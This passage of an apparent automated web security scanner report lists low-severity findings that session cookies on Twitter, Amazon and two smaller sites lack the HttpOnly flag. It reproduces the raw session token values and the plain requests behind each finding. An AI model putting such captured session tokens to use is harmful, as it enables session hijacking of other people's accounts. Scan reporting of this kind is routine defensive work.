_twitter_sess=BAh7CToMY3NyZl9pZCIlZTQ5NjQzODBhYWVkYzk2ZTk5YjBhZjc3Y2QzY2My%250AYjM6B2lkIiU1ZDJiYjViZjBmZjlhM2RiYmM3MDI4ODNjZDI3ZDY5YSIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCOHber0tAQ%253D%253D--6ec643070f608b03d4f820e3f2adac7676f7a3ca; domain=.twitter.com; path=/
k=173.193.214.243.1295964099762702; path=/; expires=Tue, 01-Feb-11 14:01:39 GMT; domain=.twitter.com
guest_id=129596410159981042; path=/; expires=Thu, 24 Feb 2011 14:01:41 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goodies/tweetbutton HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.76. http://twitter.com/joomla previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/joomla

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCOo6w7gtAToHaWQiJTFmN2YyYzU0MmRhYmY4%250AZWYyNDc4ZWFmY2M4MmYwNjIwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--724d5a6fe81e3fe03c41751c53520bd5bc139e61; domain=.twitter.com; path=/
k=173.193.214.243.1295884958395114; path=/; expires=Mon, 31-Jan-11 16:02:38 GMT; domain=.twitter.com
guest_id=129588495844059611; path=/; expires=Wed, 23 Feb 2011 16:02:38 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /joomla HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.77. http://twitter.com/kontentdesign previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/kontentdesign

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTcyODA1NmExZmQ1MDE5ZTUzYjYyYjQ0NjQzMDVjYjkxIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIhEB7vS0B--951e0307ecaa4357ec02a6a302e57cf685286962; domain=.twitter.com; path=/
k=173.193.214.243.1295964125413234; path=/; expires=Tue, 01-Feb-11 14:02:05 GMT; domain=.twitter.com
guest_id=129596412736246980; path=/; expires=Thu, 24 Feb 2011 14:02:07 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /kontentdesign HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.78. http://twitter.com/nbc/primetime previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/nbc/primetime

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlYWNhY2QyMDk5NWYxMWM2MjRjNGQ0NDdhYTA1ZTQ3%250AYzA6DnJldHVybl90byIlaHR0cDovL3R3aXR0ZXIuY29tL25iYy9wcmltZXRp%250AbWU6B2lkIiU0NDZjYzZhOTY2NmJmZTZlZjQ3OGQ5ZGIyYmQxYzRiMCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCM25R7otAQ%253D%253D--d1e94695604015df0d84f87d3e421b29e16e392e; domain=.twitter.com; path=/
k=173.193.214.243.1295910418725856; path=/; expires=Mon, 31-Jan-11 23:06:58 GMT; domain=.twitter.com
guest_id=129591041889118308; path=/; expires=Wed, 23 Feb 2011 23:06:58 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nbc/primetime HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.79. http://twitter.com/netlingo previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/netlingo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlNGZlYmY1Yjc5NTA0ZjkwYmIwMWI5OGEyZDMyZTM1%250AYjk6DnJldHVybl90byIgaHR0cDovL3R3aXR0ZXIuY29tL25ldGxpbmdvOgdp%250AZCIlNDAzOGVkNGRhYjIyMmJkOGY3ZGY1YjQzNjEzOWM1MDciCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA6D2NyZWF0ZWRfYXRsKwgfMHu9LQE%253D--a495d11ca78d3b4eafce746e4006ed9d057939a8; domain=.twitter.com; path=/
k=173.193.214.243.1295964121273602; path=/; expires=Tue, 01-Feb-11 14:02:01 GMT; domain=.twitter.com
guest_id=129596412316680845; path=/; expires=Thu, 24 Feb 2011 14:02:03 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /netlingo HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.80. http://twitter.com/nickhalstead/status/15837113167 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/nickhalstead/status/15837113167

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlMTk2NDYwNmQ5MTBjYjNlYWEzY2UzYzZiOGE3MDQ5%250ANmI6DnJldHVybl90byI3aHR0cDovL3R3aXR0ZXIuY29tL25pY2toYWxzdGVh%250AZC9zdGF0dXMvMTU4MzcxMTMxNjc6B2lkIiViZDVjNTFmMjJhOThkNmZmODRl%250AMDVlOTAyNGUyNzJhNyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCIUFe70t%250AAQ%253D%253D--67c44ee9e15f6c0fbae20d582963e29eb03333df; domain=.twitter.com; path=/
k=173.193.214.243.1295964110102891; path=/; expires=Tue, 01-Feb-11 14:01:50 GMT; domain=.twitter.com
guest_id=129596411225932495; path=/; expires=Thu, 24 Feb 2011 14:01:52 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nickhalstead/status/15837113167 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.81. http://twitter.com/share previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/share

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTVjN2EwN2Y1NmZjNDA0Y2VmY2ZjOTZjYWQxZjk1ZGRkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIGoZIui0B--d4a48b29139833c1231c8b092760bc08230aba84; domain=.twitter.com; path=/
k=173.193.214.243.1295910470933847; path=/; expires=Mon, 31-Jan-11 23:07:50 GMT; domain=.twitter.com
guest_id=129591047119299301; path=/; expires=Wed, 23 Feb 2011 23:07:51 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /share HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 403 Forbidden
Date: Mon, 24 Jan 2011 23:07:51 GMT
Server: hi
Status: 403 Forbidden
X-Transaction: 1295910471-34305-30633
Last-Modified: Mon, 24 Jan 2011 23:07:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4792
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910470933847; path=/; expires=Mon, 31-Jan-11 23:07:50 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591047119299301; path=/; expires=Wed, 23 Feb 2011 23:07:51 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTVjN2EwN2Y1NmZjNDA0Y2VmY2ZjOTZjYWQxZjk1ZGRkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIGoZIui0B--d4a48b29139833c1231c8b092760bc08230aba84; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>

<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Language" content="en-us" />
<title>Twitter / Valid URL par
...[SNIP]...

14.82. http://twitter.com/spies_assassins previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/spies_assassins

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlOTFhMjVhMGYxN2MzNTI1ZTQ5ZmUzZjczMmNkZjE3%250AMjc6DnJldHVybl90byInaHR0cDovL3R3aXR0ZXIuY29tL3NwaWVzX2Fzc2Fz%250Ac2luczoHaWQiJTYzMTVlMzExN2JlZWI3ZTk3NzRhNmY4YzVlZGMxZGFhIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIgVN6vS0B--19cfe0462f0d48cd362b4b7b652a3c4766f21675; domain=.twitter.com; path=/
k=173.193.214.243.1295964064205570; path=/; expires=Tue, 01-Feb-11 14:01:04 GMT; domain=.twitter.com
guest_id=129596406668777691; path=/; expires=Thu, 24 Feb 2011 14:01:06 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spies_assassins HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.83. http://twitter.com/tweetmeme previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/tweetmeme

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTJkNDc2OWNmNTUxYTAyZGE3OGM1MDcyNjFlYTA4NWNjIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIfFR6vS0B--e1050b38818ecc596cfa97ed5bb62afd0749dcd8; domain=.twitter.com; path=/
k=173.193.214.243.1295964064200831; path=/; expires=Tue, 01-Feb-11 14:01:04 GMT; domain=.twitter.com
guest_id=129596406693798147; path=/; expires=Thu, 24 Feb 2011 14:01:06 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tweetmeme HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.84. http://twitter.com/typekit previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/typekit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJWZmZDVhODg4ZjIyMmRmMGIwMmY4ZGM3MmFlYTJhNDMxIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIjlN7vS0B--f40f6aa2142d312dbf0ca41283ed8a96a762a0ed; domain=.twitter.com; path=/
k=173.193.214.243.1295964130260966; path=/; expires=Tue, 01-Feb-11 14:02:10 GMT; domain=.twitter.com
guest_id=129596413223631444; path=/; expires=Thu, 24 Feb 2011 14:02:12 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /typekit HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.85. http://twitter.com/ups previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/ups

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTYxMDFiNjg3MGUwYWZiNDYxNDkyZGM1NTZiMTIxZGJjIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsISp16vS0B--e1e310d0e3c9c2bde665bf97fbd81a7490ab10e3; domain=.twitter.com; path=/
k=173.193.214.243.1295964083613063; path=/; expires=Tue, 01-Feb-11 14:01:23 GMT; domain=.twitter.com
guest_id=129596408557745250; path=/; expires=Thu, 24 Feb 2011 14:01:25 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ups HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.86. http://whdhstore.hipcricket.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://whdhstore.hipcricket.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQCSTATBQ=FMADLDFCELMBEGBAHKIFEOLO; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: whdhstore.hipcricket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.87. http://www.123movers.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.123movers.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQASCCBDS=EPAJINICMHLKFHLFPHBOJOAC; path=/
clicks=duplicate; expires=Tue, 25-Jan-2011 23:11:22 GMT; path=/
userData=se=&keyword=&httpReferer=; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.123movers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 23:11:22 GMT
Server: Microsoft-IIS/6.0
Content-Length: 41036
Content-Type: text/html
Set-Cookie: clicks=duplicate; expires=Tue, 25-Jan-2011 23:11:22 GMT; path=/
Set-Cookie: userData=se=&keyword=&httpReferer=; path=/
Set-Cookie: ASPSESSIONIDQASCCBDS=EPAJINICMHLKFHLFPHBOJOAC; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
M
...[SNIP]...

14.88. http://www.amazon.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=183-0141411-2666057; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
skin=noskin; path=/; domain=.amazon.com; expires=Tue, 25-Jan-2011 14:04:22 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.89. http://www.amazon.com/Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=191-9849773-1831958; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.90. http://www.amazon.com/Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=187-6920967-0553225; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.91. http://www.amazon.com/b/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/b/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=184-9752175-3585404; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.92. http://www.amazon.com/books-used-books-textbooks/b previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/books-used-books-textbooks/b

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=175-9805255-9723637; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /books-used-books-textbooks/b HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.93. http://www.amazon.com/dp/0313363153 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/dp/0313363153

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=188-3368164-3583051; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=cNF169Ic3p+FLZlmECYIuJwUEnmMidNZpqOMXJlzFfyGkoLR/f0WF8vs6ZQU5HX+qBwE7qqoL3t9fdNtjPj3gyYsZ9OPP64Bj28wuj43iGA+RQm2aZs0leyoMSaGWoAmLLFT4m57m2mg/M9gT8m8zgH4Tc7xnQpx7XV0ybHDfWS2rJ30owc8Rfy1J4pUKTmIEUgNrK9xS2pwjtjSqsQvCH98yL0TxvhtC5sb3N+5Hsbf09QrIa+pq7nenC2PQqxud5/rAY2tUqp08BC6AQqUm9FRfG4U//pmCE8P+Nf4Ay6b7r0qWful6/GAXYGc9NJ8UFNtl8lIxNbvvKSGUwWxMFhHe2yFoXqfgLXGtAif6/GMRqdmxDwAFvFgrcU5U0NDFanauf5u8xPOR/t4Rw9yAVQVnhKW/N98x8jGOU9360lRgvHsw0R7W92mPEKiYj0h57Jn/qFxIY4=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:06:18 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.94. http://www.amazon.com/dp/0814410960 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/dp/0814410960

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=176-7210136-6598218; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=y3NkdEGeLcNmXCUiBl72zia0IgOUlzJisM6ejtj6++wAzjFW+0MbDLrBrMTYId5ScAAIGSpPr8ov4wvfMrz16qkoExEE846LElBHdCDq1wJ5G3PyH/8+t8ULEiTMRJzZ+/UmohvS0s1wbtQLhB5tRJaj+v9Qvdikv5wA8Z+9BSaQuNwa25tYVL3brZaSaxoPnkAsz7sFby/Vm3IEdAyCOCgmDlA7LSKWp7BGexnTvAm3XJETeqxNVJ4XDLyzD9mn489zuGO7Hr1Q5jDtdTkD7MsDhmN6H6NA+BAMoVhXzdj8ywD6RaU+CKSyhgSibHDJfiAf99mXgDVIui4kc0MR8MKRTBSKmuzQBaMCl0Pf98laS7P8B1wibfy99GA8Gxn4ZYxd9IYn+0IOEpAUVtWvSy3VhH2tV4F6FYuFOflVaV1k+o8nZAdjmsVsH/6mMkOtJfcsZt8CR0o=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:05:31 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.95. http://www.amazon.com/dp/B000EFAO1G previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/dp/B000EFAO1G

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=183-0598759-1123006; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=5+EPReZ8AKa7WMIFgy9cHbJVm/9tgaQgv25tnd2EAaj3A2TcoX3BYNQp+U2mBhaH6NNnCCgyjvtkzGGKQPpSQ8YmQMO5JCKLveLlxt9MugLIEpGsQ9/N5+Fno+1FBJOzE7k6DdNtiYO1TD+phGkOUWQ/bAQscWvK7bSH45/y7GXOXIwlbx9HtoYer2qT3bQI/XgRYyDrwUk/3MaxWfXupPISlccJHK+MMD1RlV2PpGnjij8hwxwPu8lFWY2ZyFBuWpfgJTPLmLB81bUuXAJVuEItWLbeo9hG152TFm3xHDssaIPB8rAFW82FLjl1caASZ+3mXZbbwjY5FdvZ3bSUoEYv4rJBnYTCCcuaPY0qDbp0lBhPOVi0eyvDVbNk4+/Hftrx7HmCu7QjCyC5NYd3aS1DdMQsjfynRE0x7QVCx6RwexxPari5JWk0LW4Q/jcI4R+KwxWl55I=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:26 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.96. http://www.amazon.com/dp/B001AIM6V2 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/dp/B001AIM6V2

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=183-9936733-9404845; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=gpJo3CBiqTqDVIjaNvl4zvNYaep1x/cFw36XGdvu+t3AZoNYj5i0ue/20d7C2ZC+I33rSpZQv0bL0wk1Ew8YoO+rtNcIBPKLYOhOlxvFtzRIdn3kvGu6M4tMOkmBEeryBbTVlsJzSNcfMpAFM/xng7ZCP9yYT0m2OdKey3rxmCeD+Fl0AmJvQvFSHWkk425/o8Da9DpaI74WLGaJ7uNOvo6JLwZb5sYP9TvVnm5hmJQsWKXZoF2OyiWVivGgzTAUd6pRUIbYAZkt1sGVL+jil+zZfxZVnjBewrBhOy9v7AhUD8T6SoAGbb4KE5ZJBYWH2OXsSjuLHVIc52YxHzs6raEMD1dV4RY1XTDpsD0MSkGHFH6QBIcq1zDxTwlTMAha08n0zKNwM+cU9SxT/rymeyJe0yjBe5km9qvYTfgoBDkuOc+G0APo8cpXuSfIyagOnBt68PFK8so=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:05:21 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.97. http://www.amazon.com/dp/B0037UT1LY previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/dp/B0037UT1LY

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=188-3953038-0825847; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=bK6rGx+CGyD+cP8GmimTlX4yOKqJEvwu6UnJY2SjL1UcG5vQjcyPPRSMkmQN8sbphtWyqe3kQNCI8rylaXXfj7BtPqZ81YiplXuRUKMy3Z/2mvrL0RV2OkiG88oBA7HbQe9Kd7fvezmpNGVnUs/WKVjx/v0XDHsIO3F31lrklY6f9VkJODasmR+vrmz5jfMxq2bRIKLa3TnEq25JcifPmFz90PVXykz/U8VHJ0uNE7A+Lbt2L2Z/SjjIzqMfkvaEaJ5CGm8K5P8lXwVh0vUHjthXVRSI9Cep53mqSnG9l0pUNqqdm4ZhxMz2Fnam7evwK9iiJKrdcr/H6916sNYxoaW3SE1y+GzhrAbM2j5TccGcCjdm1TEIUPGgRv1ET/0d7xHLJPqSIn5j3GRpNMwhQIwtYGX6XK/au2mTa3txsuMyDFNmteb/ybxsSFJKnNmQPriNDYGWivE=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:34 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.98. http://www.amazon.com/dvds-used-hd-action-comedy-oscar/b previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/dvds-used-hd-action-comedy-oscar/b

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=176-7992041-7051429; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dvds-used-hd-action-comedy-oscar/b HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.99. http://www.amazon.com/gp/css/homepage.html/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/css/homepage.html/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=180-2179319-0570468; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/css/homepage.html/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.100. http://www.amazon.com/gp/gc/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/gc/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=182-2480063-1810947; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/gc/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
